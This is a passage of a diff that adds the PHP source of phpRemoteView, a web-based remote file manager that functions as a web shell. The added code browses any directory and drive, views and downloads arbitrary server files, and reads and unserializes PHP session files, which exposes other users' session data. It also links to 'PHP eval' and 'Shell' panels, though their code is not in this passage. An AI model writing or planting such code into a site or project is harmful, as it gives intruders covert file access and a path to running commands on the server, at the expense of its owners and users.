+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function _posix_getpwuid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getpwuid($x);
+}
+
+function _posix_getgrgid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getgrgid($x);
+}
+
+function up($d,$f="",$name="") {
+   global $self,$win;
+
+   $len=strlen($d."/".$f);
+   if ($len<70) { $sf1="<font size=4>"; $sf2="<font size=5>"; }
+   elseif ($len<90) {$sf1="<font size=3>"; $sf2="<font size=4>";}
+   else {$sf1="<font size=2>"; $sf2="<font size=3>";}
+
+   echo "<table width=100% border=0 cellspacing=0 cellpadding=4><tr><td 
+   bgcolor=#cccccc> $sf1";
+
+   $home="<a href='$self'><font face=fixedsys size=+2>*</font></a>";
+   echo $home.$sf2."<b>";
+   if ($name!="") echo $name;
+   else {
+      if ($f=="") echo mm("Index of"); 
+      else echo mm("View file");
+   }
+   echo "</b></font> ";
+   
+   $path=explode("/",$d);
+
+   $rootdir="/";
+   if ($win) $rootdir=strtoupper(substr($d,0,2))."/";
+
+   $ss="";
+   for ($i=0; $i<count($path)-1; $i++) {
+      if ($i==0) 
+         $comm="<b>&nbsp;&nbsp;<big><b>$rootdir</b></big></b>"; 
+      else 
+         $comm="$path[$i]<big><b>/</big></b>";
+    
+      $ss.=$path[$i]."/";
+      echo "<a href='$self?c=l&d=".urlencode($ss)."'>$comm</a>";
+      if ($i==0 && $d=="/") break;
+   }
+   echo "</font>";
+   if ($f!="") echo "$sf1$f</font>";
+
+   if ($win && strlen($d)<4 && $f=="") {
+      echo " &nbsp; ".mm("DISK").": ";
+      for ($i=ord('a'); $i<=ord('z'); $i++) {
+         echo "<a href=$self?c=l&d=".chr($i).":/>".strtoupper(chr($i)).":</a> ";
+      }   
+   }
+
+   echo "</b></big></td><td bgcolor=#999999 width=1% align=center>
+   <table width=100% border=0 cellspacing=3 cellpadding=0 
+   bgcolor=#ffffcc><tr><td align=center><font size=-1><nobr><b><a 
+   href=$self?c=t&d=".urlencode($d).">".mm("REMVIEW TOOLS")."</a></b>
+   </nobr></font></td></tr></table>
+   </td></tr></table>";
+}
+
+
+function up_link($d,$f) {
+   global $self;
+   $notepad=str_replace(".","_",$f).".txt";
+echo "<small>
+[<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Info")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=><b>".mm("Plain")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=0&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1><b>".mm("HTML")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=4><b>".mm("Session")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=2&fnot=1><b>".mm("Image")."</b></a>]
+[<a href=$self/".urlencode($notepad)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1&fatt=".urlencode($notepad)."><b>".mm("Notepad")."</b></a>]
+[<a href=$self/".urlencode($f)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1><b>".mm("DOWNLOAD")."</b></a>]
+[<a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Edit")."</b></a>]
+</small>";
+}
+
+
+function exitw() {
+exit("<table width=100% border=0 cellspacing=2 cellpadding=0 bgcolor=#ffdddd>
+<tr><td align=center>
+".mm("Sorry, this programm run in read-only mode.")."<br>
+".mm("For full access: write")." `<tt><nobr><b>\$write_access=<u>true</u>;</b></nobr></tt>` 
+".mm("in this php-file").".</td></tr></table>
+");
+}
+
+
+
+function ob() {
+   global $obb_flag, $obb;
+   if (!isset($obb_flag)) { $obb_flag=0; $obb=false; }
+   if (function_exists("ob_start")) {
+      if ($GLOBALS['obb_flag']) ob_end_clean();
+      ob_start();
+      $GLOBALS['obb_flag']=1;
+   }
+}
+
+function obb() {
+   global $obb;
+   if (function_exists("ob_start")) {
+      $obb=ob_get_contents();
+      ob_end_clean();
+      $obb="<P>
+<table bgcolor=#ff0000 width=100% border=0 cellspacing=1 cellpadding=0><tr><td>
+<table bgcolor=#ccccff width=100% border=0 cellspacing=0 cellpadding=3><tr><td align=center>
+<b>".mm("Reason").":</b></td></tr></table>
+</td></tr><tr><td>
+<table bgcolor=#ffcccc width=100% border=0 cellspacing=0 cellpadding=3><tr><td>
+$obb<P>
+</td></tr></table>
+</table><P>";
+      $GLOBALS['obb_flag']=0;
+   }
+}
+
+function sizeparse($size) {
+   return strrev(preg_replace("!...!","\\0 ",strrev($size)));
+}
+
+
+function jsval($msg) {
+   $msg=str_replace("\\","\\\\",$msg);
+   $msg=str_replace("\"","\\\"",$msg);
+   $msg=str_replace("'","\\'",$msg);
+   return '"'.$msg.'",';
+}
+
+
+
+///////////////////////////////////////////////////////////////////////////
+
+
+switch($c) {
+
+
+// listing
+case "l":
+
+   echo $GLOBALS['html'];
+
+   if (!realpath($d)) die("".mm("Error path").". <a href=$self>".mm("Click here for start")."</a>.");
+
+   //up($d);
+   
+   ob();
+   $di=dir($d);
+   obb();
+
+   $dirs=array();
+   $files=array();
+
+   if (!$di) exit("<a href=$self?&c=l&d=".urlencode(realpath($d."..")).
+      "><nobr>&lt;&lt;&lt; <b>".mm("up directory")."</b> &gt;&gt;&gt;</nobr></a> <p>".
+      "<font color=red><b>".mm("access denied")."</b></font>: $obb");
+   while (false!==($name=$di->read())) {
+      if ($name=="." || $name=="..") continue;
+      if (@is_dir($d.$name)) { 
+         $dirs[]=strval($name);
+         $fstatus[$name]=0;
+      }
+      else {
+         $files[]=strval($name);
+         $fstatus[$name]=1;
+      }
+      $fsize[$name]=@filesize($d.$name);
+      $ftype[$name]=@filetype($d.$name);
+      if (!is_int($fsize[$name])) { $ftype[$name]='?'; $fstatus[$name]=1; }
+      $fperms[$name]=@fileperms($d.$name);
+      $fmtime[$name]=@filemtime($d.$name);
+      $fatime[$name]=@fileatime($d.$name);
+      $fctime[$name]=@filectime($d.$name);
+      $fowner[$name]=@fileowner($d.$name);
+      $fgroup[$name]=@filegroup($d.$name);
+      if (preg_match("!^[^.].*\.([^.]+)$!",$name,$ok)) 
+         $fext[$name]=strtolower($ok[1]); 
+      else 
+         $fext[$name]="";
+   }
+   $di->close();
+
+   $listsort=array();
+   if (count($dirs))
+   foreach ($dirs as $v) {
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "t": case "s": case "n": $listsort[$v]=strtolower($v); break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+   $names=$listsort;
+   //echo "<pre>";print_r($names);
+   if ($cc[1]) arsort($names); else asort($names);
+   //echo "<pre>";print_r($names);
+
+   $listsort=array();
+   if (count($files))
+   foreach ($files as $v) {
+       $v=strval($v);
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "n": $listsort[$v]=strtolower($v); break;
+                case "t": $listsort[$v]=$ftype[$v]; break;
+                case "s": $listsort[$v]=$fsize[$v]; break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+
+   //echo "<pre>DIRS:"; print_r($names);
+   if ($cc[1]) arsort($listsort); else asort($listsort);
+   //$names=array_merge($names,$listsort);
+   foreach ($listsort as $k=>$v) $names[$k]=$v;
+   //echo "<pre>FILES:"; print_r($listsort);
+   //echo "<pre>NAMES:"; print_r($names);
+
+?>
+<STYLE>
+.title {
+color: 'black';
+background: #D4D0C8;
+text-align: 'center';
+BORDER-RIGHT:   #888888 1px outset;
+BORDER-TOP:     #ffffff 2px outset;
+BORDER-LEFT:    #ffffff 1px outset;
+BORDER-BOTTOM:  #888888 1px outset;
+}
+.window {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+BACKGROUND-COLOR: #D4D0C8;
+CURSOR: default;
+}
+.window1 {
+BORDER-RIGHT:  #eeeeee 1px solid;
+BORDER-TOP:    #808080 1px solid;
+BORDER-LEFT:   #808080 1px solid;
+BORDER-BOTTOM: #eeeeee 1px solid;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+}
+.line {
+BORDER-RIGHT:   #cccccc 1px solid;
+BORDER-TOP:     #ffffff 1px solid;
+BORDER-LEFT:    #ffffff 1px solid;
+BORDER-BOTTOM:  #cccccc 1px solid;
+font: <?php echo $cp[4]; ?>pt <?php echo $cp[3]; ?>;
+}
+.line2 {
+background: #ffffcc;
+}
+.black {color: black}
+a:link.black {color: black}
+a:active.black {color: black}
+a:visited.black {color: black}
+a:hover.black {color: #0000ff}
+
+.white {color: white}
+a:link.white{color: white}
+a:active.white{color: white}
+a:visited.white{color: white}
+a:hover.white{color: #ffff77}
+
+a:link     {color: #000099;}
+a:active   {color: #000099;}
+a:visited  {color: #990099;}
+a:hover    {color: #ff0000;}
+a {
+CURSOR: default;
+}
+.windowtitle {
+font: 9pt; Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+font-weight: bold;
+color: white;
+}
+.sym {
+font: 14px Wingdings;
+}
+</STYLE>
+
+<?php
+
+function up2($d) {
+   global $win,$self;
+   $d=str_replace("\\","/",$d);
+   if (substr($d,-1)!="/") $d.="/";
+   $d=str_replace("//","/",$d);
+
+   $n=explode("/",$d);
+   unset($n[count($n)-1]);
+
+   $path="";
+   for ($i=0; $i<count($n); $i++) {
+      $path="$path$n[$i]/";
+      if ($i==0) $path=strtoupper($path);
+      $paths[]=$path;
+   }
+
+   $out="";
+   $sum=0;
+   $gr=70;
+   for ($i=0; $i<count($n); $i++) {
+      $out.="<a href=$self?c=l&d=".urlencode($paths[$i])." class=white>";
+      if (strlen($d)>$gr && $i>0 && $i+1<count($n)) {
+         if (strlen($d)-$sum>$gr) {
+            $out.="••";
+            $sum+=strlen($n[$i]);
+         }
+         else 
+            $out.=$n[$i];
+      }
+      else 
+         if ($i==0) $out.=strtoupper($n[$i]); else $out.=$n[$i];
+      $out.="/</a>";
+
+   }
+
+   return $out;
+   return "<font size=-2>$d</font>";
+}
+
+$ext=array();
+$ext['html']=array('html','htm','shtml');
+$ext['txt']=array('txt','ini','conf','','bat','sh','tcl','js','bak','doc','log','sfc','c','cpp','h','cfg');
+$ext['exe']=array('exe','com','pif','src','lnk');
+$ext['php']=array('php','phtml','php3','php4','inc');
+$ext['img']=array('gif','png','jpeg','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg');
+
+
+   echo "\n\n\n<script>\nfunction tr(";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "a$i,";
+   }
+   echo "x) {\ndocument.write(\"<tr bgcolor=#eeeeee";
+//   echo " onMouseOver='this.style.value=\\\"line2\\\"' onMouseOut='this.style.value=\\\"line\\\"'>";
+   echo " onMouseOver='this.style.backgroundColor=\\\"#FFFFCC\\\"' onMouseOut='this.style.backgroundColor=\\\"\\\"'>";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo '<td align='.$cn_align[$cn[$i]].' class=line ';
+      switch ($cn[$i])  {
+         case 's': case 'c':  case '1':  case '2':  case '3': case 't':
+            echo ' nowrap'; 
+      }
+      echo ">";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "\"+a$i+\"";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "</td>";
+   }
+   echo "</tr>\");\n}";
+   echo "\n\n</script>\n\n\n";
+
+
+   //phpinfo();
+   //echo implode(" | ",$cp);
+   echo '<table border=0 cellspacing=2 cellpadding=0 bgcolor=#cccccc 
+      class=window align=center width=60%><form name=main>';
+
+   echo '<tr><td colspan='.strlen($cn).' bgcolor=#0A246A background="'.
+   $self.'?c=img&name=fon&r=" class=windowtitle>';
+
+         echo '<table width=100% border=0 cellspacing=0 cellpadding=2 class=windowtitle><tr><td>'.
+         '<a href='.$self.'><img src='.$self.'?c=img&name=dir border=0></a>'.
+         up2($d.$f).'</td></tr></table>';
+
+   echo '</td></tr>'.
+   '<tr><td>'.
+   '<table width=100% border=0 cellspacing=0 cellpadding=0 class=window1><tr>';
+
+   $button_help=array(
+   'up'=>"UP DIR",
+   'refresh'=>"RELOAD",
+   'mode'=>'SETUP, folder option',
+   'edit'=>'DIR INFO',
+   'home'=>'HomePage',
+   'papki'=>'TREE',
+   'setup'=>'PHP eval, Shell',
+   'back'=>'BACK',
+   );
+
+   function button_url($name) {
+      global $self,$d,$f,$uurl;
+      switch ($name) {
+         case 'up': return "$self?c=l&d=".urlencode(realpath($d.".."));
+         case 'refresh': return "$self?c=l&r=".rand(0,10000)."&d=".urlencode($d);
+         case 'mode': return "$self?c=setup&ref=$uurl";
+         case 'edit': return "$self?c=d&d=".urlencode($d);
+         case 'home': return "http://php.spb.ru/remview/";
+         case 'papki': return "$self?c=tree&d=".urlencode($d);
+         case 'setup': return "$self?c=t";
+         case 'back': return "javascript:history.back(-1)";
+      }
+   }
+   echo '<td colspan='.strlen($cn).'>
+   <table border=0 cellspacing=0 cellpadding=2><tr>';
+   $buttons=array('back','up','refresh','edit','mode','disk','full','papki','setup','home');
+   $tmp=strtoupper($d[0]);
+   for ($i=0; $i<count($buttons); $i++) {
+      if ($buttons[$i]=='full') {
+         echo '<td class=window width=90% align=center nowrap><font color=#999999 face="Arial Black" 
+         style="font-size: 11pt;">&lt;?php<u>R</u>emote<u>V</u>iew?&gt;</font></td>';
+         continue;
+      }
+      if ($buttons[$i]=='disk') {
+         if (!$win) continue;
+         echo '<td width=1% title=\'Select dist\' class=window onMouseOver="this.style.backgroundColor=\'#eeee88\'" '.
+              ' onMouseOut="this.style.backgroundColor=\'\'">';
+         echo "<select name=disk size=1; style='font: 9pt Arial Black; color: #999999 '
+         onChange='location.href=\"$self?c=l&d=\"+document.main.disk.options[document.main.disk.selectedIndex].value+\":/\"'>";
+         for ($j=ord('A'); $j<=ord('Z'); $j++) 
+            echo '<option value="'.chr($j).'"'.(chr($j)==$tmp?" selected":"").'>'.chr($j);
+         echo "</select></td>";
+         continue;
+      }
+      $bturl=button_url($buttons[$i]);
+      echo '<td width=1% title=\''.$button_help[$buttons[$i]].'\' class=window'.
+           ' onMouseMove="this.style.backgroundColor=\'#eeee88\';window.status=\'** '.$button_help[$buttons[$i]].' ** '.$bturl.'\'"'.
+           ' onMouseOut="this.style.backgroundColor=\'\';window.status=\'\'"'.
+           ' onClick=\'location.href="'.$bturl.'"\'><a href=';
+      echo button_url($buttons[$i]);
+      echo '><img HSPACE=3 border=0 src='.$self.'?c=img&name='.$buttons[$i].'></a></td>';
+   }
+   echo '</tr></table>
+   </td></tr><tr>';
+
+
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "<td nowrap class=title onClick='location.href=\"".
+           "$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl\"'";
+      switch ($cn[$i]) {
+         case 1: case 2: case 3: case "s": echo " width=13%"; break;
+         case 't': echo " width=2%"; break;
+         case 'n': echo " width=40%"; break;
+      }
+      echo "><a href='$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl' class=black>";
+      switch ($cn[$i]) {
+         case "n": case "t": case "s": case "o": case "g": 
+         case "a": case "c": case "1": case "2": case "3": 
+            echo "\xA0".$cn_name[$cn[$i]]."\xA0"; break;
+         default: 
+            echo "??$cn[$i]??";
+      }
+      if ($cc[0]==="$i") {
+         if ($cc[1]=='0') echo "<img src=$self?c=img&name=sort_asc border=0>";
+         else echo "<img src=$self?c=img&name=sort_desc border=0>";
+      }
+      echo '</a></td>';
+   }
+   echo '</tr>';
+   
+   echo "\n\n<script>\n\n";
+   foreach ($names as $k=>$v) {
+
+      echo "\n\n// $k \n";
+      echo 'tr(';
+      
+      for ($i=0; $i<strlen($cn); $i++) {
+
+         switch ($cn[$i]) {
+         
+            case 'n': 
+               switch($ftype[$k]) {
+               case 'file':
+                  $vv=strtolower(substr($k,strlen($k)-4,4));
+                  $add="";
+                  if ($vv==".gif" || $vv==".jpg" || $vv==".png" || $vv==".bmp"
+                     || $vv==".ico" || $vv=="jpeg") $add="&ftype=2&fnot=1";
+                  if (substr($k,0,5)=="sess_") $add="&ftype=4";
+                  $ln='<a href='.$self.'?&c=v&d='.urlencode($d).
+                  '&f='.urlencode($k).$add.'>';
+                  break;
+
+               default:
+                  $ln='<a href='.$self.'?&c=l&d='.urlencode($d.$k).'>';
+                  break;
+               }
+               
+               if ($ftype[$k]=='dir') 
+                  $ln.='<img src='.$self.'?c=img&name=dir border=0>';
+               else {
+                  $found=0;
+                  foreach ($ext as $kk=>$vv) {
+                     if (in_array(strtolower($fext[$k]),$vv)) {
+                        $ln.='<img src='.$self.'?c=img&name='.$kk.' border=0>';
+                        $found=1;
+                        break;
+                     }
+                  }
+                  if (!$found)
+                     $ln.='<img src='.$self.'?c=img&name=unk border=0>';
+               }
+               $ln.=substr($k,0,48).'</a>';
+               echo jsval($ln);
+
+               break; 
+
+            case "t": 
+               switch ($ftype[$k]) {
+               case "dir":
+                  echo jsval("<a href=$self?c=d&d=".urlencode($d.$k).">DIR</a>"); 
+                  break;
+               case "file":
+                  echo jsval("<a href=$self/".urlencode($k)."?&c=v&fnot=1&ftype=3&d=".
+                     urlencode($d)."&f=".urlencode($k)." class=sym>\xF2</a> ".
+                     "<a href=$self?&c=i&d=".urlencode($d)."&f=".urlencode($k)." class=sym>\xF0</a>");
+                  break;
+               case "link":
+                  echo jsval("<font class=t>&#8212;&gt;</font>");
+                  break;
+               default:
+                  echo jsval("??");
+                  break;
+               }
+               break;
+            
+            case "s": 
+               if ($ftype[$k]=='file') echo jsval(sizeparse($fsize[$k])); 
+               else echo jsval(''); 
+               break;
+            
+            case "o": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               echo jsval($tow);
+               break;
+            
+            case "g": 
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
+               else $tgr=$tmp2['name'];
+               echo jsval($tgr);
+               break;
+            
+            case "a": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
+               else $tgr=$tmp2['name'];
+               echo jsval("$tow/$tgr");
+               break;
+
+            case "c": 
+               echo jsval(display_perms($fperms[$k])); break;
+            
+            case "1": echo jsval(date($cp[2],$fctime[$k])); break;
+            
+            case "2": echo jsval(date($cp[2],$fmtime[$k])); break;
+            
+            case "3": echo jsval(date($cp[2],$fatime[$k])); break;
+
+            default: echo "??$cn[$i]??";
+
+         } //switch ($ftype)
+      
+      }//for ($cn)
+      
+      echo "0);\n";
+
+   }//foreach ($names)
+   
+   echo "\n\n</script>\n\n\n";
+   
+   echo '</td></tr></table></td></tr></table></td></tr></table>';
+
+
+   echo "<P align=center>
+   <font size=1 style='Font: 8pt Verdana'><B>
+   <a href=$self?c=setup&ref=$uurl>".mm("Setup")."</a> | 
+   <a href=$self?c=t>PHP eval</a> | 
+   <a href=$self?c=phpinfo>phpinfo()</a> | 
+   <a href=$self?c=t>Shell</a> | 
+   <a href=$self?c=codes>".mm("Char map")."</a> |
+   ".mm("Language").": 
+   <a href=$self?c=set&c2=eng&ref=$uurl&pan=0>".mm("English")."</a>/<a href=$self?c=set&c2=rus&ref=$uurl&pan=0>".mm("Russian")."</a>
+   
+   </b>
+   <hr size=1 noshade width=55%><center>
+
+   <table border=0 cellspacing=0 cellpadding=0><tr><td width=32>
+   <font face=webdings style='Font-size: 22pt;'>&#0033;</font></td><td>
+   <font size=1 style='Font: 8pt Verdana'>phpRemoteView &copy; Dmitry Borodin (".mm("version")." $version)<br>
+   ".mm("Free download")." - <a href='http://php.spb.ru/remview/'>http://php.spb.ru/remview/</a></b></font></td>
+   </tr></table>";
+
+break;
+
+
+case "set": 
+
+   switch ($c2) {
+      case "sort":
+         $name=intval($name);
+         if ($name==$cc[0]) if ($cc[1]==='0') $cc[1]='1'; else $cc[1]='0';
+         $cc[0]=$name;
+         break;
+
+      case "panel":
+         $cn='';
+         foreach ($names as $k=>$v) {
+            if ($v!="") $cn.=substr($v,0,1);
+         }
+         $cc[0]=substr($sort,0,1);
+         $cc[1]=substr($sortby,0,1);
+         $cp[2]=substr($datetime,0,50);
+         $cp[3]=substr($fontname,0,50);
+         $cp[4]=substr($fontsize,0,50);
+
+         //exit("cn=$cn<br>cc=$cc");
+         break;
+
+      case "eng":
+         $cc[5]=1;
+         break;
+
+      case "rus":
+         $cc[5]=2;
+         break;
+
+   }
+
+
+   $cookie=$cc."~".$cn."~".$cp[2]."~".$cp[3]."~".$cp[4];
+   if ($c2=="reset") $cookie=implode("~",$cp_def);
+   //echo "<script>alert('$cookie')</script>";
+   setcookie("cp$pan",$cookie,time()+24*60*60*333,'/');
+   header("Location: $ref");
+   echo "<script>location.href=\"$ref\";</script>";
+   //echo "[$ref]";
+   //phpinfo();
+   break;
+
+
+case "setup": 
+
+   echo $GLOBALS['html'];
+
+   echo "<center><h3><b>phpRemoteView ".mm("setup")."</b> [<A href='javascript:history.go(-1)'>".mm("back")."</a>]</h3></center><hr size=1 noshade>";
+
+   echo "<STYLE>
+   .setup {
+      font-size: 8pt;
+      font-family: Tahoma;
+   }
+   HTML, TD {font: 90%}
+   </STYLE>";
+
+   echo "
+   <b><u>".mm("Reset all settings")."</u></b>: <a href=$self?c=set&c2=reset&pan=$panel&ref=$ref>".mm("clear")."</a>";
+   echo " <font color=white>(".mm("Current").": <small>".implode(" | ",$cp)."</small>)</font><P>";
+
+   echo "
+   <form action=$self method=post>
+   <input type=hidden name=c value=\"set\">
+   <input type=hidden name=c2 value=\"panel\">
+   <input type=hidden name=pan value=\"$panel\">
+   <input type=hidden name=ref value=\"$ref\">
+   ";
+   echo "<b><u>".mm("Colums and sort")."</u></b><br>";
+
+   echo "".mm("Sort order").": ";
+   echo "<input type=radio name=sortby value=0 id=q3 ".($cc[1]=='0'?"checked":"").">";
+   echo "<label for=q3>".mm("Ascending sort")."</label>";
+   echo "<input type=radio name=sortby value=1 id=q4 ".($cc[1]=='1'?"checked":"").">";
+   echo "<label for=q4>".mm("Descending sort")."</label><br>";
+
+   echo "<input type=radio name=sort value='n' id=q1 ".($cc[0]=='n'?"checked":"").">";
+   echo "<label for=q1>".mm("Sort by filename")."</label>";
+   echo "<input type=radio name=sort value='e' id=q2 ".($cc[0]=='e'?"checked":"").">";
+   echo "<label for=q2>".mm("Sort by filename extension")."</label>";
+   echo "<table border=0 cellspacing=0 cellpadding=3>";
+   for ($i=0; $i<2; $i++) {
+      echo "<tr>";
+      for ($j=0; $j<7; $j++) {
+         $n=$j+$i*7;
+         echo "<td align=center><label for=$n>Sort by ".($n+1)."</label>";
+         echo "<input type=radio name=sort value=$n id=$n ".($cc[0]=="$n"?"checked":"").">";
+         echo "<br><select class=setup name=names[] size=".(count($cn_name)+1).">";
+         echo "<option value=''>--hidden--";
+         foreach ($cn_name as $kk=>$vv) 
+            echo "<option value='$kk'".($n<strlen($cn) && $cn[$n]==$kk?" selected":"").">$vv";
+         echo "</select>";
+      }
+      echo "</tr>";
+   }
+   echo "</table><P>";
+
+   echo "<b><u>".mm("Date/time format")."</u></b>: <input type=text name=datetime value=\"$cp[2]\"><br>
+   d - day, m - month, y - year2, Y - year4, H - hour, m - minute, s - second<P>";
+
+   echo "<b><u>".mm("Panel font & size")."</u></b>: 
+   <input type=text name=fontname value=\"$cp[3]\" size=12> 
+   <input type=text name=fontsize value=\"$cp[4]\" size=2>pt<P>";
+
+   echo "<P><center><input type=submit value='&nbsp; &nbsp; S &nbsp; U &nbsp; B &nbsp; M &nbsp; I &nbsp; T &nbsp; &nbsp;'></center></form>";
+
+   
+   echo "<hr size=1 noshade>";
+   break;
+
+
+
+// view
+case "v":
+
+
+   if (!isset($fnot)) $fnot=0;
+   if (!isset($ftype)) $ftype=0;
+   
+   if ($fnot==0) {
+      echo $GLOBALS['html'];
+      up($d,$f);
+      echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+      up_link($d,$f);
+      echo "<hr size=1 noshade>";
+   }      
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"rb")) exit("<p><font color=red><b>".mm("access denied")."</b></font>");
+
+   if ($ftype==0 || $ftype==4) {
+      $buf=fread($fi,max(filesize($d.$f),$maxsize_fread));
+      fclose($fi);
+   }
+
+
+   switch ($ftype) {
+
+   case 0: 
+      echo "<pre>".htmlspecialchars($buf)."</pre>";
+      break;
+
+   case 1: 
+      readfile($d.$f); 
+      break;
+
+   case 2: 
+      header("Content-type: image/gif"); 
+      readfile($d.$f); 
+      break;
+
+   case 3: // download
+
+      if (isset($fatt) && strlen($fatt)>0) {
+          $attach=$fatt; 
+          header("Content-type: text/plain"); 
+      } 
+      else {
+          $attach=$f;
+          header("Content-type: phpspbru"); 
+      }
+      header("Content-disposition: attachment; filename=\"$attach\";"); 
+      readfile($d.$f); 
+      break;
+
+   case 4: // session
+   
+      echo "<xmp>";
+      if (substr($f,0,5)=="sess_" && preg_match("!^sess_([a-z0-9]{32})$!i",$f,$ok)) {
+         ini_set("session.save_path",$d);
+         session_id($ok[1]);
+         session_start();
+         print_r($HTTP_SESSION_VARS);
+      }
+      else {
+         print_r(unserialize($buf));
+      }
+      echo "</xmp>";//<hr size=1 noshade><xmp>";
+      break;
+
+   }
+
+   break;
+
+
+
+
+
+
+
+case "i": // information for FILE
+
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit(mm("file not found"));
+
+   echo "<P><big><b><tt>".htmlspecialchars($d.$f)."</tt></b></big><P>";
+   echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+   echo "<tr class=tr><td>".mm("Size")."        </td><td> ".filesize($d.$f)."</td></tR>";
+   echo "<tr class=tr><td>".mm("Owner")."/".mm("Group")." </td><td> ";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "<tr class=tr><td>".mm("FileType")."    </td><td> ".filetype($d.$f)."</td></tr>";
+   echo "<tr class=tr><td>".mm("Perms")."       </td><td> ".display_perms(fileperms($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Create time")." </td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Access time")." </td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("MODIFY time")." </td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+   echo "</table><P>";
+
+   $fi=@fopen($d.$f,"rb");
+   if ($fi) {
+      $str=fread($fi,$hexdump_lines*$hexdump_rows);
+      echo "<b>".mm("HEXDUMP PREVIEW")."</b>";
+      $n=0;
+      $a0="00000000<br>";
+      $a1="";
+      $a2="";
+      for ($i=0; $i<strlen($str); $i++) {
+         $a1.=sprintf("%02X",ord($str[$i])).' ';
+         switch (ord($str[$i])) {
+            case 0:  $a2.="<font class=s2>0</font>"; break;
+            case 32: 
+            case 10:
+            case 13: $a2.="&nbsp;"; break;
+            default:  $a2.=htmlspecialchars($str[$i]);
+         }
+         $n++;
+         if ($n==$hexdump_rows) {
+            $n=0;
+            if ($i+1<strlen($str)) $a0.=sprintf("%08X",$i+1)."<br>";
